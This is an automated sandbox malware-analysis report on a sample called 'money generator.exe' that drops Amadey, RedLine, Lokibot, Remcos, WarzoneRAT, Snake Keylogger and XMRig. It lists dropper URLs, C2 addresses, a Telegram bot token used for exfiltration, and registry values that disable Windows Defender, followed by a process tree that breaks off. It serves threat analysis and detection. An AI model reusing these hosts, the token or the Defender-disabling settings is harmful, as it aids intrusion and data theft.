amadey | be44bee1f8fe8f7a4aa42fc8e0c9e8ab37bd4e0a724a5e0d1f817c6cbf5f8745

Resubmissions

04-06-2023 19:29

230604-x7lqxaea5x 10

11-05-2023 23:54

230511-3x28ssba52 10

11-05-2023 21:10

230511-zz6gfsch6y 10

Analysis

max time kernel
13s
max time network
216s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
04-06-2023 19:29

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

money generator.exe
Size

5KB
MD5

8c72631836822bafd97a2bd198261322
SHA1

2f0975e53ce034637d83b3d8df4a30fd5db29c50
SHA256

be44bee1f8fe8f7a4aa42fc8e0c9e8ab37bd4e0a724a5e0d1f817c6cbf5f8745
SHA512

12240570eed4948d967dcec1dae5261c3a450a1b3c45b4f8df90c4a6499865d8f6e4df47f573abfb28e30495a00aa55de3e3b87b1193f527cc25ce958004c6c4
SSDEEP

96:BEumoTbuz1Kuz1yluz15dnX1GqDUtLv8e7cpRuw5bzNt:BvmoP0K0yl05J1Gq2Lv8ecRD9

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://transparenciacanaa.com.br/cidadejunina/js/vendor/debug2.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://www.drgenov.com/wp-content/uploads/debug2.ps1

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://slpbridge.com/storage/images/debug2.ps1

Extracted

Family

redline

Botnet

diza

83.97.73.126:19046

Attributes

auth_value
0d09b419c8bc967f91c68be4a17e92ee

Extracted

Family

lokibot

http://194.180.48.58/morgan/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

http://171.22.30.147/chang2/five/fre.php

http://161.35.102.56/~nikol/?p=2132

Extracted

Family

warzonerat

103.212.81.157:11011

Extracted

Family

redline

Botnet

185.215.113.37:31712

Attributes

auth_value
1aa402727eb24d99bfd960d3d786f55d

Extracted

Family

remcos

Botnet

RemoteHost

pekonomia.duckdns.org:30861

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-B0VP4N
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
startup_value
Remcos
take_screenshot_option
false
take_screenshot_time
5

Extracted

Family

snakekeylogger

https://api.telegram.org/bot6184780923:AAHbCGrBU_2zg9A-73yTyKKCMGf1tkzUFbM/sendMessage?chat_id=759814203

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot

Modifies Windows Defender Real-time Protection settings 3 TTPs 11 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

Processes:

k3926395.exek3926395.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	k3926395.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	k3926395.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 29 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4868-286-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-289-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-303-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-295-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-309-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-311-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-321-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-323-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-325-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-329-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-337-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-340-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-343-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-347-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-351-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-363-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-369-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-374-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-371-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-386-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-392-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-404-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-419-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-423-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-427-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
behavioral2/memory/4868-413-0x00000000049C0000-0x0000000004A02000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\7968320020\red.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\7968320020\botminhok.exe	family_redline
C:\Users\Admin\AppData\Local\Temp\7968320020\work.exe	family_redline

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 3 IoCs

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7968320020\red.exe	family_sectoprat
C:\Users\Admin\AppData\Local\Temp\7968320020\botminhok.exe	family_sectoprat
C:\Users\Admin\AppData\Local\Temp\7968320020\work.exe	family_sectoprat

Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
stealer keylogger snakekeylogger

Snake Keylogger payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/944-922-0x0000000000400000-0x000000000041E000-memory.dmp	family_snakekeylogger
behavioral2/memory/4360-927-0x000002A589C60000-0x000002A589C70000-memory.dmp	family_snakekeylogger

StormKitty
StormKitty is an open source info stealer written in C#.
stealer stormkitty

StormKitty payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/memory/944-922-0x0000000000400000-0x000000000041E000-memory.dmp	family_stormkitty
C:\Users\Admin\AppData\Local\Temp\stlr.exe	family_stormkitty

WarzoneRat, AveMaria
WarzoneRat is a native RAT developed in C++ with multiple plugins sold as a MaaS.
rat infostealer warzonerat

XMRig Miner payload 2 IoCs

miner

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7968320020\xmrig.exe	family_xmrig
C:\Users\Admin\AppData\Local\Temp\7968320020\xmrig.exe	xmrig

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

Async RAT payload 1 IoCs

rat

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Roaming\nig_guy1.exe	asyncrat

Warzone RAT payload 4 IoCs

rat

Processes:

resource	yara_rule
behavioral2/memory/3456-416-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat
behavioral2/memory/3456-424-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat
behavioral2/memory/3456-436-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat
behavioral2/memory/3456-803-0x0000000000400000-0x000000000055E000-memory.dmp	warzonerat

Downloads MZ/PE file
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

money generator.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1529757233-3489015626-3409890339-1000\Control Panel\International\Geo\Nation	money generator.exe

Executes dropped EXE 27 IoCs

Processes:

foto124.exex2364073.exex6871506.exef9783908.exefotod25.exey5037476.exey3114491.exek3926395.exefoto124 (2).exex2364073.exex6871506.exef9783908.exea2592d.exefotod25 (2).exey5037476.exey3114491.exek3926395.exea2592d.exeSceatt.exesecmorganzx.exeeee23xe.exehkcmd.exeDollar.exeeee23xe.exeH2.exeSceatt.exeDisableUAC.exe

pid	process
3732	foto124.exe
228	x2364073.exe
220	x6871506.exe
4348	f9783908.exe
4852	fotod25.exe
2912	y5037476.exe
3620	y3114491.exe
3940	k3926395.exe
2396	foto124 (2).exe
1048	x2364073.exe
4708	x6871506.exe
2860	f9783908.exe
1616	a2592d.exe
3012	fotod25 (2).exe
1684	y5037476.exe
2720	y3114491.exe
2672	k3926395.exe
4868	a2592d.exe
1932	Sceatt.exe
2420	secmorganzx.exe
2344	eee23xe.exe
412	hkcmd.exe
4936	Dollar.exe
2484	eee23xe.exe
1532	H2.exe
4472	Sceatt.exe
4664	DisableUAC.exe

Loads dropped DLL 1 IoCs

Processes:

eee23xe.exe

pid process

2344 eee23xe.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064

pid	process
2344	eee23xe.exe

Windows security modification 2 TTPs 2 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

k3926395.exek3926395.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	k3926395.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	k3926395.exe

Adds Run key to start application 2 TTPs 24 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

x2364073.exefotod25.exex2364073.exefotod25 (2).exey5037476.exex6871506.exefoto124 (2).exex6871506.exey3114491.exefoto124.exey5037476.exey3114491.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	x2364073.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	fotod25.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x2364073.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotod25 (2).exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y5037476.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup10 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP010.TMP\\\""	y5037476.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	x6871506.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup6 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP006.TMP\\\""	foto124 (2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup7 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP007.TMP\\\""	x2364073.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup8 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP008.TMP\\\""	x6871506.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup9 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP009.TMP\\\""	fotod25 (2).exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup11 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP011.TMP\\\""	y3114491.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto124.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	foto124.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x2364073.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x6871506.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y5037476.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y3114491.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	x6871506.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	fotod25.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	y5037476.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup5 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	y3114491.exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	foto124 (2).exe
Key created	\REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce	y3114491.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

83 checkip.dyndns.org
102 api.ipify.org
103 api.ipify.org
181 api.ipify.org
193 ipinfo.io
194 ipinfo.io
201 ip-api.com
284 api.ipify.org

flow	ioc
83	checkip.dyndns.org
102	api.ipify.org
103	api.ipify.org
181	api.ipify.org
193	ipinfo.io
194	ipinfo.io
201	ip-api.com
284	api.ipify.org

Suspicious use of SetThreadContext 5 IoCs

Processes:

a2592d.exeeee23xe.exeDollar.exeSceatt.exeH2.exe

description	pid	process	target process
PID 1616 set thread context of 4868	1616	a2592d.exe	a2592d.exe
PID 2344 set thread context of 2484	2344	eee23xe.exe	eee23xe.exe
PID 4936 set thread context of 3456	4936	Dollar.exe	Caspol.exe
PID 1932 set thread context of 4472	1932	Sceatt.exe	Sceatt.exe
PID 1532 set thread context of 4840	1532	H2.exe	aspnet_compiler.exe

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

5892 sc.exe
4364 sc.exe
8 sc.exe

pid	process
5892	sc.exe
4364	sc.exe
8	sc.exe

Detects Pyinstaller 1 IoCs

pyinstaller

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\Builtt.exe	pyinstaller

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 15 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exe

pid	pid_target	process	target process
1380	412	WerFault.exe	hkcmd.exe
440	4472	WerFault.exe	Sceatt.exe
5444	2272	WerFault.exe	cc.exe
5984	4864	WerFault.exe	certreq.exe
5824	5588	WerFault.exe	taskmgr.exe
8028	6272	WerFault.exe	tg.exe
8372	8076	WerFault.exe	Firefox.exe
7868	8264	WerFault.exe	cc (2).exe
8124	7808	WerFault.exe	rundll32.exe
1976	3164	WerFault.exe	kakazx.exe
7644	5724	WerFault.exe	nig_guy1.exe
7076	7720	WerFault.exe	botminhok.exe
9200	3240	WerFault.exe	oceanzx.exe
4668	7296	WerFault.exe	work.exe
4484	6188	WerFault.exe	1232.exe

NSIS installer 5 IoCs

installer

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\7968320020\IE_CACHE.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\7968320020\IE_CACHE.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\7968320020\INTERNET.exe	nsis_installer_1
C:\Users\Admin\AppData\Local\Temp\7968320020\INTERNET.exe	nsis_installer_2
C:\Users\Admin\AppData\Local\Temp\7968320020\BaldiTrojan-x64.exe	nsis_installer_2

Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

7116 schtasks.exe
7388 schtasks.exe
7744 schtasks.exe
6364 schtasks.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

8032 tasklist.exe

pid	process
7116	schtasks.exe
7388	schtasks.exe
7744	schtasks.exe
6364	schtasks.exe

pid	process
8032	tasklist.exe

GoLang User-Agent 6 IoCs

Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description	flow	ioc
HTTP User-Agent header	285	Go-http-client/1.1
HTTP User-Agent header	211	Go-http-client/1.1
HTTP User-Agent header	212	Go-http-client/1.1
HTTP User-Agent header	224	Go-http-client/1.1
HTTP User-Agent header	272	Go-http-client/1.1
HTTP User-Agent header	283	Go-http-client/1.1

Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

6168 taskkill.exe
9112 taskkill.exe
Runs net.exe
Runs ping.exe 1 TTPs 3 IoCs

Remote System Discovery
T1018

Processes:

PING.EXEPING.EXEPING.EXE

pid process

6816 PING.EXE
9012 PING.EXE
636 PING.EXE
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

k3926395.exek3926395.exeH2.exe

pid process

3940 k3926395.exe
3940 k3926395.exe
3940 k3926395.exe
2672 k3926395.exe
2672 k3926395.exe
2672 k3926395.exe
1532 H2.exe
1532 H2.exe
Suspicious behavior: MapViewOfSection 1 IoCs

Processes:

eee23xe.exe

pid process

2344 eee23xe.exe

pid	process
6168	taskkill.exe
9112	taskkill.exe

pid	process
6816	PING.EXE
9012	PING.EXE
636	PING.EXE

pid	process
3940	k3926395.exe
3940	k3926395.exe
3940	k3926395.exe
2672	k3926395.exe
2672	k3926395.exe
2672	k3926395.exe
1532	H2.exe
1532	H2.exe

pid	process
2344	eee23xe.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

money generator.exek3926395.exea2592d.exeSceatt.exek3926395.exeH2.exe

description	pid	process
Token: SeDebugPrivilege	4088	money generator.exe
Token: SeDebugPrivilege	3940	k3926395.exe
Token: SeDebugPrivilege	4868	a2592d.exe
Token: SeDebugPrivilege	1932	Sceatt.exe
Token: SeDebugPrivilege	2672	k3926395.exe
Token: SeDebugPrivilege	1532	H2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

money generator.exefoto124.exex2364073.exex6871506.exefotod25.exey5037476.exey3114491.exefoto124 (2).exex2364073.exex6871506.exefotod25 (2).exey5037476.exey3114491.exea2592d.exeSceatt.exe

description	pid	process	target process
PID 4088 wrote to memory of 3732	4088	money generator.exe	foto124.exe
PID 4088 wrote to memory of 3732	4088	money generator.exe	foto124.exe
PID 4088 wrote to memory of 3732	4088	money generator.exe	foto124.exe
PID 3732 wrote to memory of 228	3732	foto124.exe	x2364073.exe
PID 3732 wrote to memory of 228	3732	foto124.exe	x2364073.exe
PID 3732 wrote to memory of 228	3732	foto124.exe	x2364073.exe
PID 228 wrote to memory of 220	228	x2364073.exe	x6871506.exe
PID 228 wrote to memory of 220	228	x2364073.exe	x6871506.exe
PID 228 wrote to memory of 220	228	x2364073.exe	x6871506.exe
PID 220 wrote to memory of 4348	220	x6871506.exe	f9783908.exe
PID 220 wrote to memory of 4348	220	x6871506.exe	f9783908.exe
PID 220 wrote to memory of 4348	220	x6871506.exe	f9783908.exe
PID 4088 wrote to memory of 4852	4088	money generator.exe	fotod25.exe
PID 4088 wrote to memory of 4852	4088	money generator.exe	fotod25.exe
PID 4088 wrote to memory of 4852	4088	money generator.exe	fotod25.exe
PID 4852 wrote to memory of 2912	4852	fotod25.exe	y5037476.exe
PID 4852 wrote to memory of 2912	4852	fotod25.exe	y5037476.exe
PID 4852 wrote to memory of 2912	4852	fotod25.exe	y5037476.exe
PID 2912 wrote to memory of 3620	2912	y5037476.exe	y3114491.exe
PID 2912 wrote to memory of 3620	2912	y5037476.exe	y3114491.exe
PID 2912 wrote to memory of 3620	2912	y5037476.exe	y3114491.exe
PID 3620 wrote to memory of 3940	3620	y3114491.exe	k3926395.exe
PID 3620 wrote to memory of 3940	3620	y3114491.exe	k3926395.exe
PID 4088 wrote to memory of 2396	4088	money generator.exe	foto124 (2).exe
PID 4088 wrote to memory of 2396	4088	money generator.exe	foto124 (2).exe
PID 4088 wrote to memory of 2396	4088	money generator.exe	foto124 (2).exe
PID 2396 wrote to memory of 1048	2396	foto124 (2).exe	x2364073.exe
PID 2396 wrote to memory of 1048	2396	foto124 (2).exe	x2364073.exe
PID 2396 wrote to memory of 1048	2396	foto124 (2).exe	x2364073.exe
PID 1048 wrote to memory of 4708	1048	x2364073.exe	x6871506.exe
PID 1048 wrote to memory of 4708	1048	x2364073.exe	x6871506.exe
PID 1048 wrote to memory of 4708	1048	x2364073.exe	x6871506.exe
PID 4708 wrote to memory of 2860	4708	x6871506.exe	f9783908.exe
PID 4708 wrote to memory of 2860	4708	x6871506.exe	f9783908.exe
PID 4708 wrote to memory of 2860	4708	x6871506.exe	f9783908.exe
PID 4088 wrote to memory of 1616	4088	money generator.exe	a2592d.exe
PID 4088 wrote to memory of 1616	4088	money generator.exe	a2592d.exe
PID 4088 wrote to memory of 1616	4088	money generator.exe	a2592d.exe
PID 4088 wrote to memory of 3012	4088	money generator.exe	fotod25 (2).exe
PID 4088 wrote to memory of 3012	4088	money generator.exe	fotod25 (2).exe
PID 4088 wrote to memory of 3012	4088	money generator.exe	fotod25 (2).exe
PID 3012 wrote to memory of 1684	3012	fotod25 (2).exe	y5037476.exe
PID 3012 wrote to memory of 1684	3012	fotod25 (2).exe	y5037476.exe
PID 3012 wrote to memory of 1684	3012	fotod25 (2).exe	y5037476.exe
PID 1684 wrote to memory of 2720	1684	y5037476.exe	y3114491.exe
PID 1684 wrote to memory of 2720	1684	y5037476.exe	y3114491.exe
PID 1684 wrote to memory of 2720	1684	y5037476.exe	y3114491.exe
PID 2720 wrote to memory of 2672	2720	y3114491.exe	k3926395.exe
PID 2720 wrote to memory of 2672	2720	y3114491.exe	k3926395.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 1616 wrote to memory of 4868	1616	a2592d.exe	a2592d.exe
PID 4088 wrote to memory of 1932	4088	money generator.exe	Sceatt.exe
PID 4088 wrote to memory of 1932	4088	money generator.exe	Sceatt.exe
PID 4088 wrote to memory of 1932	4088	money generator.exe	Sceatt.exe
PID 1932 wrote to memory of 4472	1932	Sceatt.exe	Sceatt.exe
PID 1932 wrote to memory of 4472	1932	Sceatt.exe	Sceatt.exe
PID 1932 wrote to memory of 4472	1932	Sceatt.exe	Sceatt.exe

C:\Users\Admin\AppData\Local\Temp\money generator.exe
"C:\Users\Admin\AppData\Local\Temp\money generator.exe"
1⤵
- Checks computer location settings
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4088

C:\Users\Admin\AppData\Local\Temp\7968320020\foto124.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\foto124.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:3732

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2364073.exe
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\x2364073.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:228

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x6871506.exe
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\x6871506.exe
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:220

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f9783908.exe
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\f9783908.exe
5⤵
- Executes dropped EXE
PID:4348

C:\Users\Admin\AppData\Local\Temp\7968320020\fotod25.exe
"C:\Users\Admin\AppData\Local\Temp\7968320020\fotod25.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4852

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y5037476.exe
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\y5037476.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:2912

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y3114491.exe
C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\y3114491.exe
4⤵
